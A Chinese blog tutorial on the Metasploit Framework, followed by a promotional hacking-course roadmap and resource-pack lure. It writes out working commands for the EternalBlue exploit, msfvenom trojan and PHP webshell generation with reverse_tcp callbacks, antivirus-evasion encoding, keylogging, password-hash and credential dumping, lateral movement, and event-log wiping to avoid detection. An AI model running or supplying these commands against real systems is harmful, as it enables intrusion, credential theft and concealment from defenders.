Metasploit Framework(MSF)实战指南:渗透测试全流程 + 案例解析,吃透这款黑客利器

​​​​​​​


1. MSF简介

Metasploit Framework(MSF)是一个开源的渗透测试框架,集成了漏洞利用代码(Exploit)、载荷(Payload)、辅助工具(Auxiliary)和后渗透模块(Post),被广泛应用于安全研究和渗透测试。MSF通过模块化设计,简化了漏洞利用和后渗透操作,帮助测试人员快速验证系统安全性。它是渗透测试领域的核心工具之一,理解其模块和使用流程是学习的关键。


2. MSF模块详解

MSF的强大功能源于其模块化设计,主要模块包括:

  • Exploit(漏洞利用模块) 针对特定漏洞的攻击代码,例如ms17_010_eternalblue,用于触发目标系统的漏洞。

  • Payload(载荷模块) 漏洞利用成功后执行的代码,例如反弹Shell(reverse_tcp),用于建立与攻击者的连接。

  • Auxiliary(辅助模块) 用于信息收集或辅助任务,例如端口扫描(portscan/tcp)、弱口令测试(ssh_login)。

  • Post(后渗透模块) 在获得目标访问权限后的操作,例如权限提升(getsystem)、数据收集(hashdump)。

  • Encoder(编码器) 对Payload进行编码以绕过杀毒软件检测,例如shikata_ga_nai

  • NOP(空指令) 填充Payload以确保执行稳定性,通常用于缓冲区溢出攻击。

核心要点:Exploit、Payload、Auxiliary和Post是MSF的基础模块,理解其功能和应用场景至关重要。


3. MSF安装与更新方式
  • 安装(以Kali Linux为例)

    apt update && apt install metasploit-framework
    
    
    
  • 更新

    apt update && apt upgrade metasploit-framework
    
    
    

    或使用旧命令(视版本而定):msfupdate

核心要点:保持MSF最新版本可以获取最新的漏洞利用代码和功能修复。


4. 渗透测试攻击步骤

渗透测试是一个系统化的流程,通常包括以下步骤:

  1. 信息收集 扫描目标的端口、服务版本,识别潜在漏洞。

  2. 漏洞发现 通过公开漏洞数据库(如Exploit-DB)查找目标系统的已知漏洞。

  3. 漏洞利用 选择合适的Exploit模块,配置Payload,执行攻击。

  4. 后渗透 进行权限提升、数据收集和持久化控制。

  5. 清理痕迹 删除日志和文件,避免被检测。

案例

  • 目标:Windows Server,开放445端口。

  • 步骤

    1. 使用auxiliary/scanner/smb/smb_version扫描SMB版本。

    2. 在Exploit-DB中搜索MS17-010漏洞。

    3. 使用exploit/windows/smb/ms17_010_eternalblue执行攻击。

    4. 提权并抓取密码哈希。

    5. 使用clearev清除日志。

核心要点:每个步骤依赖前一步的结果,需按顺序执行。


5. 基本命令使用

熟练掌握MSF的基本命令是操作的基础,以下是常用命令:

  • msfconsole:启动MSF控制台。

  • search <keyword>:搜索模块,例如search ms17-010

  • use <module>:选择模块,例如use exploit/windows/smb/ms17_010_eternalblue

  • show options:查看模块配置项。

  • set <option> <value>:设置参数,例如set RHOST 192.168.1.100

  • exploitrun:执行模块。

  • sessions:查看和管理会话。

案例

  • 攻击MS17-010

    use exploit/windows/smb/ms17\_010\_eternalblue
    set RHOST 192.168.1.100
    set PAYLOAD windows/x64/meterpreter/reverse\_tcp
    set LHOST 192.168.1.7
    exploit
    
    
    

核心要点:基本命令是MSF操作的基石,需通过实践熟练掌握。


6. MSF生成木马命令

MSF的msfvenom工具用于生成各种Payload,例如木马程序。

  • 生成Windows木马

    msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.1.7 LPORT=4444 -f exe -o shell.exe
    
    
    
  • 监听反弹Shell

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse\_tcp
    set LHOST 192.168.1.7
    set LPORT 4444
    exploit
    
    
    

核心要点:木马生成与监听需配合使用,确保LHOST和LPORT参数一致。


7. 公开漏洞利用查找方式

渗透测试人员常使用以下资源查找公开漏洞:

  • Exploit-DB 通过searchsploit命令搜索漏洞利用代码,例如:searchsploit exchange windows remote

  • 其他资源 CVE数据库、GitHub、漏洞公告(如NVD)。

案例

  • 查找MS17-010searchsploit ms17-010

核心要点:公开漏洞是渗透测试的重要依据,需结合多种资源验证。


8. Windows漏洞利用案例

漏洞:MS17-010(EternalBlue),影响Windows SMBv1,可实现远程代码执行。

  • 利用步骤

    1. use exploit/windows/smb/ms17_010_eternalblue

    2. set RHOST 192.168.1.100

    3. set PAYLOAD windows/x64/meterpreter/reverse_tcp

    4. set LHOST 192.168.1.7

    5. exploit

  • 案例

    • 场景:目标为Windows 7,445端口开放。

    • 结果:成功获取Meterpreter会话,可执行后渗透操作。

核心要点:Payload需匹配目标系统架构(如x64)。


9. Linux漏洞利用案例

漏洞:Dirty Cow(CVE-2016-5195),Linux内核提权漏洞。

  • 利用步骤

    1. 已有低权限会话(SESSION 1)。

    2. use exploit/linux/local/dirtycow

    3. set SESSION 1

    4. exploit

  • 案例

    • 场景:目标为Ubuntu 16.04,已通过SSH弱口令获得Shell。

    • 结果:成功提权至root。

核心要点:Linux漏洞多用于提权,需先获得初始访问权限。


10. Auxiliaries(辅助模块)

辅助模块用于信息收集和辅助任务,常用模块包括:

  • 端口扫描auxiliary/scanner/portscan/tcp

    • 示例:set RHOSTS 192.168.1.0/24 && run
  • SMB版本扫描auxiliary/scanner/smb/smb_version

    • 示例:set RHOSTS 192.168.1.100 && run
  • SSH弱口令测试auxiliary/scanner/ssh/ssh_login

    • 示例:set USERNAME root && set PASSWORD toor && run

案例

  • 扫描SMB版本

    use auxiliary/scanner/smb/smb\_version
    set RHOSTS 192.168.1.0/24
    run
    
    
    

核心要点:辅助模块是信息收集的关键工具。


11. Post(后渗透攻击)

后渗透模块用于在获得访问权限后执行进一步操作,常用命令包括:

  • 进程迁移run post/windows/manage/migrate

  • 权限提升getsystem

  • 键盘记录keyscan_startkeyscan_dump

  • 屏幕截图screengrab

  • 抓取密码哈希run post/windows/gather/hashdump

案例

  • 场景:已获得Windows低权限会话。

  • 步骤

    1. run post/windows/manage/migrate(绑定到svchost.exe)。

    2. getsystem(提权)。

    3. run post/windows/gather/hashdump(抓取哈希)。

核心要点:后渗透模块用于巩固控制权和收集敏感信息。


12. 进程迁移

渗透进入的Shell通常不稳定,易被用户关闭,因此需要迁移到稳定进程。

  • 命令run post/windows/manage/migrate

  • 目的:绑定到如explorer.exesvchost.exe等系统进程。

案例

  • 场景:Meterpreter会话绑定在Web服务器进程上,易被重启。

  • 步骤run post/windows/manage/migrate PID=1234(PID为稳定进程ID)。

核心要点:进程迁移提高Shell的持久性和隐蔽性。


13. 权限提升

在获得低权限访问后,需提升至管理员或SYSTEM权限。

  • 命令getsystem

  • 其他方式:利用本地提权漏洞,如exploit/windows/local/bypassuac

案例

  • 场景:已获得普通用户Shell。

  • 步骤getsystem 或使用提权模块。

核心要点:权限提升是后渗透的关键步骤。


14. 键盘记录与屏幕截图
  • 键盘记录keyscan_start(开始记录)、keyscan_dump(查看记录)。

  • 屏幕截图screengrab

案例

  • 场景:监控目标用户操作。

  • 步骤keyscan_start 后等待一段时间,keyscan_dump 查看按键记录。

核心要点:用于收集敏感信息,如密码。


15. 抓取密码哈希
  • 命令run post/windows/gather/hashdump

  • 工具:Mimikatz(需加载kiwi模块)。

案例

  • 场景:已提权至SYSTEM。

  • 步骤load kiwicreds_all(列举凭据)。

核心要点:哈希可用于进一步攻击,如传递哈希(Pass-the-Hash)。


16. 文件系统操作
  • 命令

    • pwd:当前目录。

    • getwd:本地工作目录。

    • search -f *.txt -d c:\:搜索文件。

    • upload / download:上传/下载文件。

案例

  • 场景:查找并下载敏感文件。

  • 步骤search -f *password*.txt -d c:\users

核心要点:文件操作是后渗透中收集数据的重要手段。


17. 移植漏洞利用代码模块

MSF支持用户移植外部漏洞利用代码。

  • 步骤

    1. 查找Exploit-DB中的POC。

    2. 转换为MSF模块格式。

    3. 加载并使用。

案例

  • 场景:移植自定义漏洞利用代码。

  • 步骤:参考MSF官方文档编写模块。

核心要点:自定义模块扩展MSF功能,适应更多场景。


18. Web后门

Web后门(如Webshell)是常见的持久化控制手段。

  • 生成Webshell

    msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.php
    
    
    
  • 监听:与木马监听相同。

案例

  • 场景:上传Webshell到Web服务器。

  • 步骤:上传shell.php,访问触发,MSF接收会话。

核心要点:Webshell提供对Web服务器的持久访问。


19. 内网攻击与渗透测试过程

内网渗透通常涉及横向移动和域渗透。

  • 命令

    • run post/windows/gather/enum_logged_on_users:枚举登录用户。

    • run autoroute:设置路由。

    • use exploit/windows/smb/psexec:横向移动。

案例

  • 场景:已控制边界服务器,需攻击内网其他主机。

  • 步骤:使用autoroute设置路由,psexec攻击其他主机。

核心要点:内网渗透需利用已控制主机作为跳板。


20. 后渗透操作命令集合
  • 上传文件upload /path/to/file

  • 下载文件download /path/to/file

  • 执行命令execute -f cmd.exe

  • 查看系统信息sysinfo

  • 清除日志clearev

核心要点:后渗透命令用于维护访问和收集信息。


21. 清理痕迹
  • 命令clearev(清除Windows事件日志)

  • 其他操作:删除上传的文件、关闭开启的服务等。

案例

  • 场景:完成渗透测试后清理。

  • 步骤clearevrm /path/to/file

核心要点:清理痕迹避免被检测,保持隐蔽性。


知识点流程总结
  1. 准备阶段 安装并更新MSF,启动msfconsole

  2. 信息收集 使用Auxiliary模块扫描目标。

  3. 漏洞利用 选择Exploit模块,配置Payload,执行攻击。

  4. 后渗透 提权、数据收集、持久化。

  5. 清理 清除痕迹,避免暴露。

网络安全的知识多而杂,怎么科学合理安排?

下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!

初级黑客
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取

在这里插入图片描述

7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.

零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

8、高级黑客
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。

网络安全工程师企业级学习路线

很多小伙伴想要一窥网络安全整个体系,这里我分享一份打磨了4年,已经成功修改到4.0版本的**《平均薪资40w的网络安全工程师学习路线图》**对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

 如果你想要入坑黑客&网络安全工程师,这份282G全网最全的网络安全资料包!

网络安全大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

​​​​​
学习资料工具包

压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。

​​​​​

网络安全源码合集+工具包

​​​​

视频教程

​​​​

视频配套资料&国内外网安书籍、文档&工具

​​​
​​ 因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

黑客/网安大礼包:优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!

特别声明:

此教程为纯技术分享!本文的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!!

本文转自网络如有侵权,请联系删除。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值